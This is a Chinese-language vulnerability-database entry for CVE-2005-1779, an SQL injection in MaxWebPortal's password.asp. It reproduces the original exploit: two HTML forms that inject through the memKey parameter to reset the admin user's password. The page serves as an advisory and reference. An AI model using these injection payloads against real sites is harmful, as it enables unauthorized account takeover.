MaxWebPortal 存在SQL注入漏洞

MaxWebPortal 存在SQL注入漏洞

漏洞ID 1108813 漏洞类型 SQL注入
发布时间 2005-05-26 更新时间 2005-10-20
图片[1]-MaxWebPortal 存在SQL注入漏洞-安全小百科CVE编号 CVE-2005-1779
图片[2]-MaxWebPortal 存在SQL注入漏洞-安全小百科CNNVD-ID CNNVD-200505-1249
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1012
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1249
|漏洞详情
MaxWebPortal1.35、1.36、2.0和20050418Next中的password.asp存在SQL注入漏洞,远程攻击者可以通过memKey参数来执行任意SQL命令。
|漏洞EXP
<!--
Hi, I'm Soroush Dalili from Grayhatz Security Group (GSG) . I found dangerous sql injection
in Maxwebportal version 1.35,1.36,2.0, 20050418 Next
Remote user can inject his/her code in "memKey" var. and change other users password in
password.asp

Exploit codes to proof: 
-->

-----------------Code Start-----Version 1.35 and older--------------
<form action="http://[URL]/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><br>
pass2: <input name="pass2" type="text" value="123456" size="150"><br>
Id: <input name="memId" type="text" value="-1" size="150"><br>
Member Key: <input name="memKey" type="text" value="foo' or M_Name='admin" size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------

Version 1.36, 2.0, 20050418 Next:

-----------------Code Start-----Version 1.36, 2.0, 20050418 Next--------------
<form action="http://[URL]/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><br>
pass2: <input name="pass2" type="text" value="123456" size="150"><br>
Id: <input name="memId" type="text" value="-1" size="150"><br>
Member Key: <input name="memKey" type="text" value="foo') or M_Name='admin' or ('1'='2"

size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------

# milw0rm.com [2005-05-26]
|参考资料

来源:SECTRACK
名称:1014048
链接:http://securitytracker.com/id?1014048
来源:SECUNIA
名称:15511
链接:http://secunia.com/advisories/15511

相关推荐: Multiple Vendor Email Client JavaScript Information Leakage Vulnerability

Multiple Vendor Email Client JavaScript Information Leakage Vulnerability 漏洞ID 1104977 漏洞类型 Configuration Error 发布时间 1998-02-01 更新…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享